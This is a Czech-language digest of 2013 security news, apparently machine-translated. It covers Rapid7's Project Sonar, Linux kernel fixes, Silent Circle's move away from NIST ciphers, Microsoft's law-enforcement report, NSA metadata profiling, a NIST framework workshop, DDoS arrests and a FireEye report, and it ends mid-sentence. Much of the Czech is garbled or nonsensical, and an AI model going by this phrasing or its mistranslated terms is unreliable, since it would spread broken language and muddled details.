Rapid7 nabízí bezplatné nástroje a terabajtů vlastního výzkumu 01.10.2013. Nástroje HD Moore, ředitel výzkumu v Rapid7, vyzval všechny bezpečnostní profesionálové spolupracovat na výzkumu v oblasti bezpečnosti a analýzu dat vytvořit větší povědomí a porozumění otázkám bezpečnosti a jejich důsledky. Pro usnadnění tohoto Rapid7 Labs zahájila projekt Sonar , které nabízejí bezplatné nástroje a terabytů dat z vlastních výzkumných snah. HD zahájila iniciativu během jeho proslov na DerbyCon 3.0, ve kterém on obhajoval internet rozsáhlá analýza jako praktický nástroj pro bezpečnostní odborníky smysluplně zlepšit jejich zabezpečení sítě. "Bezpečnostní problémy jsou běžné přes internet a situace se zhoršuje, a to lépe. Bezpečnostní komunita potřebuje spustit sdílení dat a pracují společně, takže můžeme identifikovat a řešit obrovské problémy, které nás, "řekl HD. "To není jen práce pro výzkumné pracovníky - všechny bezpečnostní profesionálové mohou být jejich vlastní výzkumný a 'prohledá všechny věci!" nebo přispívají ke společné analýzy. Snažíme se, aby se to snadné pro průměru, mělo chlap, které jim pomohou pochopit hodnotu údajů, které mají. " S cílem usnadnit tento společný přístup, Rapid7 Labs vytvořila a vyzdvihl řadu bezplatných nástrojů pro snímání a analýzy, včetně ZMap , Nmap, SSL certifikát grabbers, DNS zpětného vyhledávání skenování a další. terabytů dat z minulosti skenování internetového výzkumu je také k dispozici pro prohlížení a analýzu, například nálezy z celoročního Critical.IO skenování projektu řízeného Moore a Rapid7 Labs. Critical.IO zdůraznila řadu všudypřítomných bezpečnostních otázek, včetně chyb v UPnP, IPMI a sériového portu servery. Hodnota těchto druhů cyklech, ve zdůraznění rozšířenou nejistotu přes internet je také patrný v mnoha podobných iniciativ, jako je například Internet sčítání lidu 2012, Shodan, a nejnověji University of ZMap zprávy Michiganu. Zatímco hodnota těchto nálezů není nesporné, šetření byly tradičně považovány za území specializovaných výzkumných týmů, jako Rapid7 Labs a ZMap tým z University of Michigan. Rapid7 je přesvědčen, že tento přístup nebude efektivní při vytváření bezpečnější internet bez větší spolupráce s širší bezpečnostní komunity.
Linux Kernel aktualizace opravuje DoS, svodové Bugs
30.9.2013 Zranitelnosti Vývojáři Debianu alerted uživatele Linuxu koncem minulého týdne na novou verzi linuxového jádra, linux-2.6, která opravuje 11 samostatných chyby, které by mohlo otevřít jádro popření servisního útoku, úniku a zvýšení úrovně oprávnění.
Dann Frazier, správce Debian oznámil aktualizace zabezpečení prostřednictvím společnosti listserv pátek pozdě .
První dvě chyb zabezpečení a ohrožení identifikátory opravit úniku informací v jádře, které by mohly být zneužity pomocí 64bitového systému (CVE-2013 - 2141), a když to může znít archaicky, CD-ROM ovladač (CVE-2013-2164) . Podle Jonathana Salwan, se sídlem v Paříži Linux výzkumník, za určitých podmínek, lokální uživatel v systému se špatnou funkcí CD-ROM by mohl získat přístup k citlivým paměti jádra.
Salwan také objevil další zranitelnosti v jádře OpenVZ, že místní uživatelé mohou využít k získání přístupu k citlivým paměti jádra.
Kees Cook, člen týmu Ubuntu bezpečnost, objevil čtyři z 11 zranitelností. Dva z nich může vést k útočníkovi havárii systému pomocí DoS (CVE-2013-2888 a 2892), zatímco další dva jsou poněkud méně závažné a vliv na bloku subsystém a b43 síťový ovladač. Tyto chyby by opravdu pouze jednat o problém s těmi, se speciálně konfigurované systémy.
Zbývající opravy řešit řadu problémů, včetně úniků paměti v provádění PF_KEYv2 zásuvky rodiny a Linux SCTP protokol.
Podle obvyklé Debian, která provozuje jeden z více populárních linuxových distribucích dnes, je povzbudivé uživatelům přejít na linux-2.6 a veškerá s tím spojená v uživatelském režimu-linux balíčky.
Ti, kteří hledají více informací o zranitelnosti mohou zamířit do aktualizace zabezpečení Debianu, DSA-2766-1 , od pátku.
Nový projekt Sonar Crowdsources Embedded Device chyby zabezpečení analýzy
30.9.2013 Zranitelnosti Stav vestavěného zabezpečení zařízení je špatná, a tam nebylo moc v cestě diskuse o opaku. Je dobře známo, že dodavatelé šetřit na bezpečnosti, například prodej, routery a další síťové převodovky chráněny pouze ve výchozím nastavení hesel nebo jiných důležitých zařízení inženýrství musí být přístupné pomocí jednoduchého příkazu telnet. Tyto akce představují enormní riziko pro infrastruktury, která tato zařízení, takže je otevřený útoku hackerů. Tyto chyby mohou vést ke ztrátě dat, snížení výkonu sítě, nebo ještě hůře ohrožují život v nebezpečí, pokud se kritické služby, jako je voda nebo energie mají vliv.
Pro Metasploit tvůrce HD Moore, to výzva k akci. Moore investoval vážně čas na zkoumání dat z předchozích skenů IPv4 adresního prostoru hledají zařízení, které odhalila nekvalitní výchozí konfiguraci a dalších zranitelných místech. Jeho vlastní Critical.io project , spolu s Internet sčítání lidu 2012 , Carna botnet a řadu akademických a výzkumných nástrojů, které prohledá internet a návratové hromadných dat na zařízení exposures udělal spoustu zářit drsné světlo na rizika těchto webových- čelí zařízení.
Ale Moore věří, že je dostatek místa pro další analýzu. On postupoval svou práci spolupracuje s týmem vědců z University of Michigan o projektu Sonar , úložiště skenovaných dat, která byla odpovědně vybírá výzkumné obce. Moore řekl, že doufá, že se zapojily bezpečnostní komunity nejen na analýzu dat získaných od skenů veřejné čelí sítí, ale také přispěje dat. Projekt Sonar se pořádá University of Michigan v scans.io .
"Potřebujeme více oči na něj, protože potřebujeme hanbu spadnout na těchto dodavatelů za strašných produktů oni produkují," řekl Moore, dodává jako příklad, že našel více o 10.000 příkazové shelly sedí on-line přístupný přes telnet, které by dát outsidera root přístup k zařízení v pochybnost. "Skutečnost, že máme problémy, jako že tam, kde není ani předstírání jistoty, ale tato zařízení nejsou nijak lepší av některých případech jsme svědky expanze zranitelné zařízení meziroční nárůst, to bylo volání k akci ke mně, aby to těžší pro dodavatelům vyhnuly zkoumání, kterou si zaslouží.
"Ta věc je hodně lidí, kteří chtěli vidět výsledky a chtěl vidět malé fotky, ale ne mnoho lidí chce kopat do věcí a vytáhněte ven," řekl Moore. "Budeme se snažit to udělat, aby to chutnější pro amatérské výzkumných pracovníků a každý den správci IT mohli použít jako zdroj."
V současné době existuje pět datové soubory hostitelem projektu Sonar, formálně známý jako Internet-Wide Scan úložiště dat, oba týmy používají řadu nástrojů pro sběr dat včetně ZMap , Internet skener vyvinutý na UM, UDPBlast, nmap a MASSCAN mezi ostatními. Dva datové soubory byly přispěl na University of Michigan, a ty patří prověřování komunikaci přes HTTPS, kteří hledají surovin certifikáty X.509 (43 milionů byly zahrnuty od 108 milionů počítačů), jakož i údaje z IPv4 skenování na portu 443. provedeného v říjnu loňského roku na míru dopad hurikánu Sandy. Rapid7 přispěla také tři datové soubory: služby otisky prstů z projektu Mooreova Critical.IO; skenování IPv4 SSL služby na portu 443 a v pravidelných DNS pro všechny IPv4 záznamy PTR.
"Poté, co procházel době dost dat se ukázalo, existuje tolik různých chyby a problémy, které opravdu jen berou některé lidské oči na věci," řekl Moore. "Je to opravdu nemá smysl sedět na takovém množství dat a ne o ni podělit."
Výzkumní pracovníci a IT manažeři mohou využít data v mnoha různými způsoby, ve velkém by vědci vytvářet zranitelnosti údaje na dodavatele nebo na výrobku nebo na užším rozsahu, data mohou být použita k tomu inventury majetku, například na konkrétní Rozsah IP adres za účelem identifikovat stávající zranitelná. Rapid7 tým použil data, například zrychlit penetrační test na 80.000 uzly sítě. Moore řekl, celá Asset Inventory bylo provedeno asi za 20 minut, na rozdíl od tři dny obvyklými nástroji a skenování.
Časná reakce byly pozitivní, a řekl Moore někteří vědci již začaly vytvářet webové služby a dotazy kolem dat. Moore dodal, že UM a Rapid7 doufáme, že další datové soubory budou nakonec přispělo, pokud jsou kolekce snahy udělat legálně av rámci etických mezích. Je to z toho důvodu, Moore řekl, že ani UM ani Rapid7 bude hostit údaje shromážděné z internetu nebo sčítání lidu Carna botnet pro tento projekt, zákonnosti, které je ještě v pochybnost.
"Právě teď se řízení od nabízení jakékoliv webové služby, nechci mít službu, kde lidé jsou v závislosti na mne, aby se jim výsledky, ani nechci být zodpovědný za to, co vidí dotazy utečou "řekl Moore. "To není to, co se snažíme řešit. Bereme v hromadných dat, které je více gigabajtů 5-6 terabajtů, a dělat, že k dispozici na webových stránkách v hromadné formě pro každého, kdo dělá výzkum stáhnout. Současně, bereme různé plátky údajů, jak dobře a říkat "Řekněme, vzít si jméno pole pro tento paket" nebo vyřadil v určité oblasti a učinit které jsou k dispozici pro lidi, kteří dělají spíše neformální testování. "
Silent Circle odklon od šifer NIST v brázdě Zjevení NSA
30.9.2013 Šifrování První hlavní domino padat na světě crypto po NSA netěsnosti Edward začal Snowdena bylo rozhodnutí Lavabit, bezpečný e-mail poskytovatele, vypnout v srpnu než v souladu s nařízením vlády. Krátce poté, Silent Circle, jiný poskytovatel bezpečných e-mailu a dalších služeb, řekl, že přestává s Silent Mail nabídku , stejně. Nyní Silent Circle jde ještě o krok dále tím, že plánuje nahradit NIST související šifer se svými výrobky s nezávisle navržených ty, ne proto, že společnost nevěří NIST, ale proto, že jeho vedení se obává vlivu NSA na rozvoj NIST z šifer v posledních několika desetiletích.
Jon Callas , jeden ze zakladatelů Silent Circle a respektovaného cryptographer pondělí řekl, že společnost byla sledoval všechny vývoji a zjevení pocházející z netěsností NSA a dospěla k rozhodnutí, že je to v nejlepším zájmu společnosti a svým zákazníkům nahradit šifru AES a SHA-2 hash funkce a poskytnout zákazníkům další možnosti. Tyto možnosti, Callas řekl, bude zahrnovat non-NIST šifry jako Twofish a klubka.
"V Silent Circle, jsme se rozhodnout, co dělat o celé velké otázce, zda NSA bylo rozvrácení bezpečnost. Přes všechnu zábavu, že blogů o to bylo, akce mluví hlasitěji než slova. Phil [Zimmermann], Mike [Janke] a já jsme o tom diskutovali a cítíme, že musí udělat něco. To je něco, že v relativně blízké budoucnosti, budeme realizovat non-NIST šifrovací sada, "Callas napsal v blogu vysvětluje rozhodnutí.
Twofish je šifrovací sada Napsal Bruce Schneier , a to byl jeden z finalistů v průběhu soutěže AES, ale prohrál na Rijndael algoritmu. Je odolný vůči dešifrování tak daleko, a Callas řekl, že má také tu výhodu, že snadná výměna pro AES v němém kruhových výrobků. Společnost také bude nahrazovat SHA-2, starší NIST hash funkce, s přadeno, což bylo finalisty v nedávno dokončené SHA-3 soutěže.
"Chystáme se změnit náš použití šifry AES s Twofish šifry , jak je to drop-in náhrada. Chystáme se změnit náš používání SHA-2 hash funkcí s funkcí klubka hash . Jsme také zkoumá pomocí Threefish šifru, kde to má smysl. (Úplné odhalení:. Jsem spoluautorem přadeno a Threefish) Threefish je srdcem přadena, a je tweakable, široký-bloková šifra. Existuje spousta skvělých věcí, které můžete dělat s ním, ale to vyžaduje určité přehodnocení protokolů, "řekl Callas.
Rozhodnutí Silent Circle přichází v době, kdy existuje mnoho nezodpovězených otázek NSA s vlivem na kryptografických algoritmů, zejména těch norem vypracovaných NIST. Národní institut pro standardy a technologie je zodpovědný za rozvoj technických norem pro americkou federální vládou a mnoho z těchto norem jsou přijaty jinými organizacemi, konkrétně kryptografických standardů. Nedávná odhalení úniků z NSA ukázaly, že NSA má nějaké nespecifikované schopnosti proti některým kryptografických algoritmů a také pracuje na NIST ovlivnit vývoj norem. V reakci na jeden z těchto zjevení, NIST sám doporučuje, aby lidé přestali používat Dual EC_DRBG generátor náhodných čísel vyvinutý pod jeho dohledem.
"DUAL_EC_DRBG diskuse byla komická. Hlavní diskuse byla, zda to bylo zlé, nebo jen hloupý, a hádali se na stranu zla dokonce znamenalo připustit, že je technologicky hloupý algoritmus, který odešle do diskuse zábavné spirály meta-komentáře, "řekl Callas.
Silent Circle odklon od AES a SHA-2 by neměl být chápán jako obvinění z těchto dvou šifer, Callas řekl, ale spíše znamení toho, že existují lepší možnosti tam bez stínu potenciálního vlivu NSA visí nad nimi.
"To neznamená, že si myslíme, že AES je nejistý, nebo SHA-2 je nejistý, nebo dokonce, že P-384 je nejistá. To neznamená, že si myslíme, že menší z našich přátel na NIST, kterého máme důsledné dodržování, jsou oběťmi zrady NSA, spolu se zbytkem svobodného světa. Pro nás je přerušeno kouzlo. Právě jsme dál. Ne polibek, žádné slzy, žádná sbohem suvenýry , "řekl.
Microsoft hlásí nula požadavku na vymáhání práva na obsah Skype
30.9.2013 Zranitelnost Microsoft zprávu o dodržování požadavků činným v trestním řízení dat ukazuje status quo pro softwarový gigant od posledního vykazovaného období. Zatímco počet žádostí od vymáhání práva po celém světě klesla v prvních šesti měsících roku 2013, Microsoft dodrženy 79 procent žádostí vyplývajících z úřední obsílky, soudní příkazy a warrantů. Pouze 2,2 procenta z těchto požadavků vedlo v zákaznickém obsah ze služeb jako je Outlook, Hotmail, Xbox Live, nebo SkyDrive jsou předáni orgánům; žádné Skype žádosti o uživatelský obsah byl dělán.
Microsoft čísla v této zprávě neberou v úvahu národních bezpečnostních požadavků na údaje, které jsou zpracovány v samostatné zprávě a zůstane diskutabilní téma pro technologické společnosti. Zabil nich, včetně Microsoft, Google, Facebook, Yahoo a nejnověji LinkedIn a Dropbox, že požádal zahraniční zpravodajské Surveillance soud (FISC) o povolení zveřejňovat souhrnné počty o národnostních požadavků bezpečnosti Dopis o zákaznických dat.
Mezitím, Microsoft výkon práva Zpráva ukazuje, že většina žádostí pochází z orgánů v USA, Velké Británii, Turecku, Německu a Francii, Skype žádosti týkající se převážně soustředí je z USA, Velké Británii, Francii a Německu. Microsoft uvedl, že žádné Skype obsah dat byl obrácen k vymáhání práva mezi 81 procent Skype žádosti vyhověly.
"Tato nová data ukazují, že přes naše služby jen nepatrný zlomek z účtů, které jsou méně 0,01 procenta stále ovlivněn požadavku na vymáhání práva na zákaznických dat," píše se ve zprávě. "Z malého množství, které byly ovlivněny, převážná většina se týkala zveřejnění non-obsahu dat."
Non-obsah dat, podle zprávy, obsahuje uživatelské jméno, fakturační adresa, IP adresa historie a další. Obsah údajů, na druhou stranu, je definována jako text e-mailové zprávy, obrázků a souborů uložených ve službě SkyDrive souborů, informací v kalendáři a kontaktní informace.
Zahrnuje všechny služby společnosti Microsoft, včetně Skype, společnost obdržela 7014 žádostí donucovacích orgánů, které ovlivňují 18.809 účtů, 11 procent z těchto požadavků vedlo uživatelského obsahu, který se převrátil a 65 procent non-obsahových dat žádostí byly dodrženy. Žádostí Microsoft nedodržela, a to buď právní zátěž nebyla splněna, nebo ne zákaznických dat byl zjištěn u daného účtu.
Co se týče Skype dat sám, bylo 759 předloženo více žádostí o 1564 účtech. Žádný obsah žádosti byly provedeny ve vztahu k Skype, přičemž 790 žádostí o non-obsahovými byly dodrženy, 80 procent žádostí.
Skype, který byl pořízen v roce 2011 společnosti Microsoft, byl středobodem skandálu dozoru NSA, protože se stal veřejností v červnu. Téměř okamžitě, údaje unikly bývalý informátorů NSA Edward Snowdena je uvedeno, že nejen že špionážní agentura má pre-šifrování přístupu k aplikaci Outlook Hotmail a dat, ale to také spolupracoval se společností Microsoft na přístup ke službě SkyDrive a Skype. Podle zprávy v deníku Guardian , NSA se chlubil, že byl schopen ztrojnásobit počet video hovory přes Skype zachycena v Prism programu.
Microsoft popřel tato obvinění a spolu s dalšími mohutnými tech firem je požádal soud FISA pro schopnost zvýšit svou zpráv na základě žádostí od vlády týkající se národní bezpečnosti. K dnešnímu dni jsou společnosti dovoleno publikovat NSL data požadavku ve svazcích po 1000, Microsoft hlášeny 0-999 pro rok 2012 a mezi 1000 a 1999 o rok dříve.
Menší společnosti jako LinkedIn a Dropbox tvrdí, že úroveň průhlednosti podávání zpráv klesá a může znamenat, že tyto společnosti mohly být větší národní bezpečnostní cíle pro datové požadavky, než jsou.
NSA vytváří profily amerických občanů tím, že sbírá metadata, veřejné a obchodní údaje 30. září 2013. Špionáž | Zabezpečení V roce 2010 byly NSA analytici pokyn ignorovat předchozí omezení, když to přišlo k analýze telefonát a e-mailové protokoly náležející do Američanů, kteří měli spojení na zahraniční cíle a používat jakékoliv další informace, údaje, které by mohly sbírají o osobě z veřejných, obchodních a jiných zdroje vytvořit podrobný obraz o jejich životě a jejich napojení na osobu zájmu NYT zprávy . změna byla zaznamenána ve zprávě 2011 unikly informátorů NSA Edward Snowdena, který také ve výčtu omezení, která se zůstat na svém místě a nové, které byly přidány. Například analytici provádět sledování amerických kontaktů pouze tehdy, pokud byli schopni citovat cizí zpravodajskou základ (terorismus, špionáž zahraničních politiků, šíření zbraní atd.), pro takovou sondou. Oni byli také nuceni dodržovat zřízení "minimalizace pravidla", tedy nesměli sdílet data shromážděná z ní vyplývající s dalšími federálními agenturami výjimkou případu, kdy uvedla, že trestný čin byl nebo měl být spáchán nebo při jejich vstupu bylo nutné smysl informací, které byly shromážděny a analyzovány . Tyto nové pokyny týká jen telefon a e-mailovou metadata. Pokud věřili, že informace, které posbíral upozornil na něco stinné děje, NSA ještě jako zpravodajské soud dát svolení k odposlouchávání amerického občana zájmu. Přesto by to rošt Američanům nejvíce o tomto posledním zjevení je, že Rozhodnutí nechat analytiků pokračovat ve své práci, i když byl hovor nebo email "řetězení" proces vedoucí k americkým občanem vyrobeny v tajnosti - ". bez přezkoumání národní zpravodajské soudu nebo veřejná rozprava" Politika změna byla odůvodněna 1979 rozsudek Nejvyššího soudu, který řekl, Američané mohli mít očekávání soukromí čísla o tom, co oni nazývají. "Na základě tohoto rozhodnutí, ministerstvo spravedlnosti a Pentagon rozhodl, že je přípustné, vytvoření kontaktních řetězce pomocí Američanů" "metadata", který zahrnuje časování, umístění a další podrobnosti hovorů a e-mailů, ale ne jejich obsah, "řekl NYT novinářům. "Agentura není povinna usilovat o warranty na analýzy z cizího soudu Intelligence Surveillance." nová politika byla schválena ministr obrany Robert M. Gates a generální prokurátor Michael B. Mukasey v roce 2008, ale to bylo jen po pilotním projektu úspěšně provedeny tento "sociální sítě", grafů, že tato politika byla nakonec provedena. unikly dokumenty neuvádějí - a NSA odmítla sdělit - jaké telefonní a e-mailové databáze se používají Graf tyto sociální kontakty. Avšak dokumenty, sdílet jméno jednoho z hlavních nástrojů, který agreguje shromažďoval informace a umožňuje analytikům práci s ním. Jmenuje Mainway a podle zprávy se krmí denně s obrovskými řádků dat pocházejících ze zdrojů, jako jsou " Agentura je optické kabely, firemní partnery a zahraniční počítačové sítě, které byly hacknutý. " "NSA analytici mohou využívat tyto informace k rozvoji portrét jednotlivce, jeden, který je možná více kompletní a prediktivní chování, než by bylo možné získat tím, že poslouchá na telefonní hovory nebo čtení e-mailů, říkají odborníci. telefon a e-mail protokoly, například umožňují analytikům identifikovat přátele lidí a spolupracovníky, zjistit, kde byli v určité době, získají klíč k náboženské nebo politické orientace a vyberte citlivé informace, jako běžné volání k psychiatrovi kanceláře, pozdní noční zprávy na mimomanželský partner nebo výměny s kolegy plotr, "reportéři poukázat na problém. Není známo, kolik životů Američanů a akce byly tajně přezkoumány s pomoc této politiky.
4. Cybersecurity Framework Workshop: Dobré i špatné zprávy 30.9.2013 Zabezpečení
Měl jsem možnost navštívit řadu průmyslových událostí tohoto roku a je vidět vývoj kybernetické bezpečnosti v oblasti průmyslu. Jedním z nich byl čtvrtý národní institut standardů a technologie je (NIST) Cybersecurity Framework Workshop (CFW). Kaspersky byl v účasti na předchozích akcích, ale hlavní rozdíl s tímhle, bylo to, že teď jsme měli sponzory.
4. seminář byl další kolo získat zpětnou vazbu na nejnovější verzi kybernetické rámci zveřejněné na 28 srpnu 2013 . Moje takeaways z této dílny jsou (dobře, ne příliš daleko od předchozího 3. workshopu):
Cybersecurity Framework není o "jak", je to o tom "co" CFW je více marketingový tlak na začátečníky a opakovací pro profesionály Tam je obrovská poptávka po průmyslových lidé rozhodují o tom, jak. Whitelisting a výchozí Deny jsou nutné Celkově lze říci, výsledný rámec není dostatečně specifický pro některý z vládou stanovených 17 odvětví kritické infrastruktury , k pochopení praktické kroky provádění kybernetické strategie, nebo alespoň pochopit praktickou sadu nástrojů (aka bezpečnostní kontroly).
Pro ty, kteří nejsou obeznámeni, rámec se skládá z pěti funkcí, kategorií pro každou z těchto funkcí, podkategorií pro každou kategorii, a zvlášť, bezpečnostní profily a splatnosti zkušebny.
Funkce popsat obecně, jaké jsou vaše kybernetické bezpečnosti by se měl skládat z: zjišťování, prevenci, odhalovat je, reagovat a zpět. Většina lidí souhlasí s tím o těchto funkcích, zatímco někteří argumentují, že zlepšení / Aktualizace by měla být výslovně přidány v oblasti bezpečnosti. Na rozdíl od mnoha jiných rámců, bezpečnost je stále více zastaralý, protože i když můžete být bezpečné dnes, v průběhu 12 měsíců, které již nemůže být situace, protože z nových metod útoku.
Kategorií uvedených v tomto rámci jsou komplexní stejně. Ale, bohužel, na podkategorie (najdete úplný seznam v samotném dokumentu , viz str. 14) je mix mezi abstraktní kategorie, která pomáhá vidět doménu a potenciálních cílů, ale ponechává výběr metod pro čtenáře a technické zabezpečení ovládací prvky, které mnoho sektorů najít nepoužitelná nebo jsou neúplné. Takže je to překvapivé, že pro druhý seminář v řadě vidíme stejný příběh: když některý z pracovní skupiny začne mluvit o podkategorií pracovní stánky. Většina účastníků se nepodařilo prozkoumat celý seznam, kromě zástupci různých odvětví jsou nespokojeni s tím, jak jsou stanoveny podkategorie vůbec - pro své vlastní důvody.
Celkově lze říci, že podkategorie rozhodnuto lze považovat za docela selhání. Například pouze kontrola týkající se průmyslových řídicích systémů jednoduše říká, "PR.PT-5: Správa riziko pro specializované systémy, včetně provozních technologií (např. ICS, SCADA, DCS a PLC) v souladu s analýzou rizik". Je to velmi zvláštní a užitečné pro lidi, OT, jestli víte, co tím myslím.
Zdá se, že je to dost těžké mít "Bezpečnostní kontroly", podepsaná v univerzálním způsobem pro různá odvětví - včetně IT a průmyslové systémy a to ani nebere v úvahu menší sektory. Například, obvykle finanční sektory jsou věřil postarat dat docela dobře, ale příklad financí byl docela ilustrativní - všechna data jsou veřejná, takže utajení není velkým problémem, ale transakce a integritu dat akcií v držení lidí ' , je nutností. To je podobné situaci, pro průmyslové kontrolní systémy.
Můj dojem je, že NIST se rozhodl opustit práci na definování přesného souboru podkategorií a ovládacích prvků do jednotlivých odvětví kritické infrastruktury.
Tato metoda však není dobré pro určité odvětví, v závislosti na průmyslovém síti, protože tam jsou 9 odvětví, ve kterých převažují průmyslové systémy, ale regulační orgány a průmyslové svazy jsou různé - DOE, tečka. Takže není jasné, zda každý sektor má co do činění s "instance" rámce na jejich vlastní, a zda by toto mělo být devět krát opakovat s rozdílnými výsledky, protože sdílejí mnoho rysů, vzhledem k jejich závislosti na průmyslových řídicích systémů.
Také NIST opustit detaily implementace Rámcové každého odvětví. Jednou z otázek, které nebyly zodpovězeny je v dílně, bylo: "Jak implementovat bezpečnost v tomto rámci, nebo alespoň, co se začnete?"
Jednou z možností je odstranit podkategorie z rámce, aby byl v souladu, a snažit se představit univerzální bezpečnostních kontrol, ale dělat Kategorie stanovení cíle rámcové.
Rámec zahrnuje také další rozměr - profil (co vaše organizace musí mezi různými kategoriemi a ovládacích prvků - jaké jsou vaše bezpečnostní priority na základě obchodních specifik) a úrovní (jak zralý jste v kybernetické bezpečnosti). I když se zdá, že je zdravý rozum, všech rámců v různých oblastech v podstatě sdílejí stejný přístup k "flexibility" a "splatnosti". V praxi však v CFW je to spíše zmatek, protože není jasné, jak měřit to, co máte, a Tier zase co to tier stojí.
Takže to, co je ta dobrá zpráva?
NIST přijal Kaspersky Lab Whitelist ( Default Deny ) přístup k zabezpečení kritické infrastruktury - a to "PR.PT-3: Zavést a udržovat technologii, která vynucuje politiky zaměstnávat popřít, umožňují-všechny-by-výjimka politiku umožnit provedení oprávněné programy na organizační systémy (aka whitelisting aplikací a síťový provoz) ". Věříme, že tato naprosto dává smysl, a my jsme rádi, že víme, že náš hlas byl slyšet, a naše vize sdíleny. Hlavním cílem a hlavní dopad Cyber Security Framework je marketing - tlačí všech kritických infrastruktur, včetně mnoho z těch, kteří ještě nemají žádné počítačové bezpečnostní programy, začít dělat něco, a poskytuje větší rozpočtu CISO těch, kteří mají jasnou vizi, již. Mnoho lidí navrhl uvedení rámec, v marketingu brožuře, aby bylo jasné. Třetí pozitivní, protože v důsledku tohoto workshopu, je to, že jakmile tlačil liší, může Framework lidem z různých firem. Pomáhá společnostem lépe porozumět sobě v kybernetické oblasti je důležité, protože většina kritické infrastruktury jsou vzájemně propojeny a outsourcing navzájem, což může způsobit vážné dominový efekt na potenciální nehody kybernetické bezpečnosti. Úsilí Cybersecurity marketing může být užitečné v mnoha zemích kvůli kybernetické bezpečnosti kritických infrastruktur. Za čtvrté, pro jednotlivá odvětví práce na zadání bezpečnostní kontroly a mapování rámec stávajících sektoru a průmyslových standardů bude provedeno, i když tato osoba nebo skupina nebyla identifikována. Cyberframework by se mohlo stát křížový odkaz mezi různými sektoru standardů a rámců, které budou také pomáhat budovat lepší porozumění mezi subjekty na technické úrovni. Zatímco Cybersecurity rámec může sloužit jako první krok v prosazování bezpečnosti rozhodující infrastruktury, jediný způsob, jak skutečně zvýšit ochranu je, aby se ujistil, že jde s krokem dva (kde mám začít?) A třetí krok (jaké jsou nejlepší postupy k následování ?) pro každé z odvětví kritické infrastruktury. Z těchto odvětvích existuje 10 průmyslových centrické ty, které jsou méně zkušení v oblasti IT bezpečnosti a celkově mají odlišnou povahu k jejich procesů (vysoká dostupnost, místo vysoké důvěrnost).
Takže, stále zůstává otázka, jak můžeme učinit průmyslové bezpečnosti praktičtější pro aktuální hrozeb?
Kaspersky Lab je aktivně vyhledává možné varianty s našimi průmyslovými partnery.
Dva mladí lidé zatčení za různé útoky DDoS 30. září 2013. Kriminalita | Hacking Po masivní DDoS útok proti anti-spam outfit SpamHAUS na začátku tohoto roku, 35-rok-starý holandský občan věřil být Sven Kamphuis, majitel a manažer holandské firmy Cyberbunker hosting, byl zatčen ve Španělsku, protože byl podezřelý z účasti v útoku.
Ale co teprve nyní vyšlo najevo, že současně se 16-letý školák v Londýně byl zadržen v Londýně metropolitní policie kvůli podezření podobné. Ne hodně je známý o tomto chlapci, s výjimkou, že byl propuštěn na kauci a je naplánován se objevit před soudem v průběhu tohoto roku. Podle zprávy od London Evening Standard: "Podezřelý byl nalezen se svými počítačovými systémy otevřené a přihlášeni do různých virtuálních systémů a fór," a měl "velké množství peněz protékající jeho bankovní účet. " Vyšetřovatelé věří, že byl / je členem mezinárodní počítačové trestné činnosti gangu, a jeho zatčení byl zticha tak dlouho, byl pravděpodobně pokus zabránit zbytek skupiny z tváření podezření, že něco není v pořádku. Jako připomínka: DDoS útok namontován proti SpamHAUS na konci března dosáhl asi 300 gigabitů za sekundu ve špičce, což je největší DDoS útok v historii internetu, a podle některých zpráv, což způsobuje dočasné zhoršení služeb se v něm. V Mezitím, další mladík byl zadržen v Německu, protože důstojníci kriminality německé Cyber Competence Center (4C) Státní kriminální policie spojili ho (pravděpodobně neúmyslné) DDoS útok, který ochromil oficiální stránky spolkové země Sasko- Anhalt, a vzal je v režimu offline po dobu několika hodin. Několik týdnů by na internetových stránkách nelze aktualizovat jeho správci, a to byl velký problém, protože server nabízí informace o programech financování. Útok byl ve skutečnosti zaměřena na národní datové centrum v hale , která mimo jiné provozuje výše uvedené webové stránky. Podezřelý byl sledován policií, která na svého bytu, kde našli kopie dat uložených v datovém centru. Podezřelý - 18-rok-starý student z Hamburku - má nesdílí se s policií, co ho namontovat útok. Pokud bude usvědčen počítačové sabotáže a krádeží dat, mohl by skončit s velkým vězením.
Na motivy národní stát řízený kybernetických útoků 30. září 2013. Hacking | Počítačový útok | Zabezpečení FireEye vydala zprávu, která popisuje jedinečné mezinárodní a místní charakteristiky útoku kampaní vedených kybernetických vládami po celém světě.
"Kybernetické zbraně jsou používány jako výhodu v reálném konfliktu," řekl Kenneth Geers, senior analytik celosvětovou hrozbu, FireEye. "Kraje mají vlastní sadu zbraní kybernetických, které se budou používat ke svému prospěchu, pokud jde o konflikt, nebo na pomoc své spojence. Svět je v kybernetické válce s útoky v každém směru a umístění. Cyber záběry jsou vypalovány v době míru pro okamžité geopolitických konce, stejně jako připravit se na možné budoucí kinetických útoků. Vzhledem k tomu, útoky jsou lokalizované a výstřední, chápání geopolitiky každém regionu může pomoci v obraně kybernetické. " "Největší výzvou pro odstrašení, obrana proti, nebo odplata za kybernetických útoků je problém správně určit pachatele. Balistické rakety mají zpáteční adresy, "řekl profesor John Arquilla na Námořní postgraduální škole. "Ale počítačové viry, červy a popření servisních útoků často pocházejí od za závojem anonymity. Nejlepší šance prorazit tento závoj je dodáván s dovedné míchání forenzních "zpět" hackerských technik, s hlubokou znalostí strategických ostatních kultur a jejich geopolitických cílů. " Kybernetické útoky již osvědčily jako low-cost, high-výplatní cestě hájit národní suverenitu a promítat moc státu. Mezi klíčové charakteristiky pro některé regiony patří: . asijsko-tichomořské domovem pro velké a byrokratické hackerské skupiny, jako například "Komentář Crew", který sleduje cíle ve vysokofrekvenční, brute-force útoky. Rusko / Eastern Europe. Tyto kybernetické útoky jsou technicky vyspělejší a vysoce účinné, jak se vyhnout odhalení. Blízký východ. Tyto zločinci jsou dynamické, často používat kreativitu, podvod a sociální inženýrství, aby přimět uživatele k ohrožení své vlastní počítače. Spojené státy. Nejsložitější, cílené, a důsledně navržena cyber . zaútočit kampaně k dnešnímu dni Kromě toho zpráva spekuluje faktory, které by mohly změnit svět v počítačové oblasti bezpečnosti v blízké-až střednědobém horizontu, včetně:
